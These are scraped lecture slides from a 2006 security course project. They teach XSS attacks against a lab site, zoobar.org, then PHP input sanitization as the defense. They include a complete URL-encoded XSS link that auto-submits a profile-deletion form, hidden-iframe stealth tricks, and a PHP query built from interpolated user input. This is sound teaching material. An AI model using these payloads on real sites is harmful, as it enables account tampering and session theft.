Download presentation
Presentation is loading. Please wait.
1
1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006
2
2 Deadlines
3
3 Part 1 Attacks
4
4 Overview Explore several attack types Requires both effectiveness and stealth Learn: How an attacker can evade sanitization Consequences of an exploit JavaScript Very basic CSS
5
5 Attack A: Cookie Theft Use URL encoding Could hijack session Attack C: Login Snooping Evade sanitization Handle DOM events email Attacks Attack B: Silent Transfer Navigate browser Use iframes, forms Attack D: Profile Worm Confuse site scripts Replicate zoobar.org link email zoobar.org form badguy.com stanford.edu redirect badguy.com zoobar.org form zoobar.org
6
6 JavaScript Browser scripting language with C-like syntax Sandboxed, garbage collected Closures var x = 3; var y = function() { alert(x); }; return y; Encapsulation/objects function X() { this.y = 3; } var z = new X(); alert(z.y); Can interpret data as code (eval) Browser-dependent
7
7 Invoking JavaScript Tags: alert( ‘Hello world!’ ) Links: javascript:alert( ‘Hello world!’ ) Wrap code in “void” if it has return value Event handlers: CSS (IE only) body { background: url(javascript:alert( ‘Hello world!’ )); }
8
8 DOM Manipulation Examples document.getElementByID(id) document.getElementsByTagName(tag) document.write(htmltext) document.createElement(tagname) document.body.appendChild(node) document.forms[index].fieldname.value = … document.formname.fieldname.value = … frame.contentDocument.getElementById(id)
![8 DOM Manipulation Examples document.getElementByID(id) document.getElementsByTagName(tag) document.write(htmltext) document.createElement(tagname) document.body.appendChild(node) document.forms[index].fieldname.value = … document.formname.fieldname.value = … frame.contentDocument.getElementById(id)](http://images.slideplayer.com./16/4902485/slides/slide_8.jpg "8 DOM Manipulation Examples document.getElementByID(id) document.getElementsByTagName(tag) document.write(htmltext) document.createElement(tagname) document.body.appendChild(node) document.forms[index].fieldname.value = … document.formname.fieldname.value = … frame.contentDocument.getElementById(id)")
9
9 Arrays and Loops Example: Change href of all links on a page var links = document.getElementsByTagName(‘a’); for(var i = 0; i < links.length; i++) { var link = links[i]; link.href = “javascript:alert(‘Sorry!’);”; }
![9 Arrays and Loops Example: Change href of all links on a page var links = document.getElementsByTagName(‘a’); for(var i = 0; i < links.length; i++) { var link = links[i]; link.href = javascript:alert(‘Sorry!’); ; }](http://images.slideplayer.com./16/4902485/slides/slide_9.jpg "9 Arrays and Loops Example: Change href of all links on a page var links = document.getElementsByTagName(‘a’); for(var i = 0; i < links.length; i++) { var link = links[i]; link.href = javascript:alert(‘Sorry!’); ; }")
10
10 Other Useful Functions Navigation document.location document.formname.submit() document.forms[0].submitfield.click() Delayed Events node.addEventListener(eventname, handler, useCapture) node.removeEventListener(eventname, handler, useCapture) window.setTimeout(handler, milliseconds)
![10 Other Useful Functions Navigation document.location document.formname.submit() document.forms[0].submitfield.click() Delayed Events node.addEventListener(eventname, handler, useCapture) node.removeEventListener(eventname, handler, useCapture) window.setTimeout(handler, milliseconds)](http://images.slideplayer.com./16/4902485/slides/slide_10.jpg "10 Other Useful Functions Navigation document.location document.formname.submit() document.forms[0].submitfield.click() Delayed Events node.addEventListener(eventname, handler, useCapture) node.removeEventListener(eventname, handler, useCapture) window.setTimeout(handler, milliseconds)")
11
11 Stealthy Styles var node = document.getElementByID(“mynodeid”); node.style.display = ‘none’; // may not load at all node.style.visibility = ‘hidden’; // still takes up space node.style.position = ‘absolute’; // not included in flow document.write( // can also write CSS rules to page “ #mynodeid { visibility:hidden; } ”);
12
12 Example: Profile Deleter Malicious hyperlink deletes profile of user who clicks it Only works when user logged in User might have multiple tabs open Might have chosen/forgotten not to log out Might appear in another user’s profile Uses vulnerability in users.php from Attack A Constructs profile deletion form and submits it ???
13
13 Find vulnerability Site reflects query parameter in input field Link can include anything we want here
14
14 Copy form data View source to find form fields Create copycat form with our modifications
15
15 Close previous, Button click triggers form submit URL encode
16
16 Debugging Check error It didn’t work. Open JavaScript console Undefined No properties! Two forms with same name
17
17 Now with correct form Fixed version
18
18 Profile deleted Final Test users.php replaced with index.php http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform %0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C% 2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22 Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28 %29%3C%2Fscript%3E
19
19 Post form into hidden iframe … Open page with form in hidden iframe … document.myframe.contentDocument.forms[0].profile_update.value =“”; Stealthier approaches
![19 Post form into hidden iframe … Open page with form in hidden iframe … document.myframe.contentDocument.forms[0].profile_update.value = ; Stealthier approaches](http://images.slideplayer.com./16/4902485/slides/slide_19.jpg "19 Post form into hidden iframe … Open page with form in hidden iframe … document.myframe.contentDocument.forms[0].profile_update.value = ; Stealthier approaches")
20
20 Part 2 Defenses
21
21 Goals Learn: How easy it is to make mistakes That even simple code can be hard to secure Techniques for appropriate input validation PHP Very basic SQL Little programming knowledge can be a dangerous thing
22
22 PHP: Hypertext Preprocessor Server scripting language with C-like syntax Can intermingle static HTML and code > Encapsulation/objects class X { var $y = 3; } $z = new X(); echo $z->y; Can embed variables in double-quote strings $user = “world”; echo “Hello $user!”; or$user = “world”; echo “Hello”. $user. “!”; Form data in global arrays $_GET, $_POST, …
23
23 SQL Widely used database query language Fetch a set of records SELECT * FROM Person WHERE Username=‘grader’ Add data to the table INSERT INTO Person (Username, Zoobars) VALUES (‘grader’, 10) Modify data UPDATE Person SET Zoobars=42 WHERE PersonID=5 Query syntax (mostly) independent of vendor
24
24 File structure index.php users.php transfer.php login.php includes/ auth.php (cookie authentication) common.php (includes everything else) navigation.php (site template) db/ zoobar/ Person.txt (must be writable by web server) Includes /usr/class/cs155/projects/pp2/txt-db-api/… Only edit these files
25
25 txt-db-api Third-party text file database library Data can be int, string, and autoincrement Need to escape strings: \’ \” \\ Actually magic_quotes_gpc does this for us $recipient = $_POST[‘recipient’]; // already escaped $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executeQuery($sql); if( $rs->next() ) $id = $rs->getCurrentValueByName(‘PersonID’);
![25 txt-db-api Third-party text file database library Data can be int, string, and autoincrement Need to escape strings: \’ \ \\ Actually magic_quotes_gpc does this for us $recipient = $_POST[‘recipient’]; // already escaped $sql = SELECT PersonID FROM Person WHERE Username= $recipient ; $rs = $db->executeQuery($sql); if( $rs->next() ) $id = $rs->getCurrentValueByName(‘PersonID’);](http://images.slideplayer.com./16/4902485/slides/slide_25.jpg "25 txt-db-api Third-party text file database library Data can be int, string, and autoincrement Need to escape strings: \’ \ \\ Actually magic_quotes_gpc does this for us $recipient = $_POST[‘recipient’]; // already escaped $sql = SELECT PersonID FROM Person WHERE Username= $recipient ; $rs = $db->executeQuery($sql); if( $rs->next() ) $id = $rs->getCurrentValueByName(‘PersonID’);")
26
26 Attack A: Cookie Theft Attack C: Login Snooping Defenses to Part 1 Attack B: Silent Transfer Attack D: Profile Worm
27
27 Sanitization Techniques addslashes(string) Already done by magic_quotes_gpc Inverse: stripslashes(string) htmlspecialchars(string [, quote_style]) Converts & ” to HTML entities Use ENT_QUOTES to change ’ to ' strip_tags(string, [, allowable_tags]) Max tag length 1024 Does not sanitize tag properties preg_replace(pattern, replacement, subject) More info: http://php.net
![27 Sanitization Techniques addslashes(string) Already done by magic_quotes_gpc Inverse: stripslashes(string) htmlspecialchars(string [, quote_style]) Converts & to HTML entities Use ENT_QUOTES to change ’ to ' strip_tags(string, [, allowable_tags]) Max tag length 1024 Does not sanitize tag properties preg_replace(pattern, replacement, subject) More info:](http://images.slideplayer.com./16/4902485/slides/slide_27.jpg "27 Sanitization Techniques addslashes(string) Already done by magic_quotes_gpc Inverse: stripslashes(string) htmlspecialchars(string [, quote_style]) Converts & to HTML entities Use ENT_QUOTES to change ’ to ' strip_tags(string, [, allowable_tags]) Max tag length 1024 Does not sanitize tag properties preg_replace(pattern, replacement, subject) More info:")
28
28 More XSS hunting Look for untrusted input used as output Note sanitization already applied to each variable Form data has magic_quotes_gpc, db data does not Determine browser context for output Inside a quoted string within a tag – worry about ’ ” Outside a tag – worry about Input to eval – very dangerous Sanitize the output if necessary No penalty for erring on the side of caution But sanitizing multiple times may lead to problems No credit for solving non-goals: SQL injection, etc.
29
29 Good luck! Start early Ask questions Be creative
Similar presentations
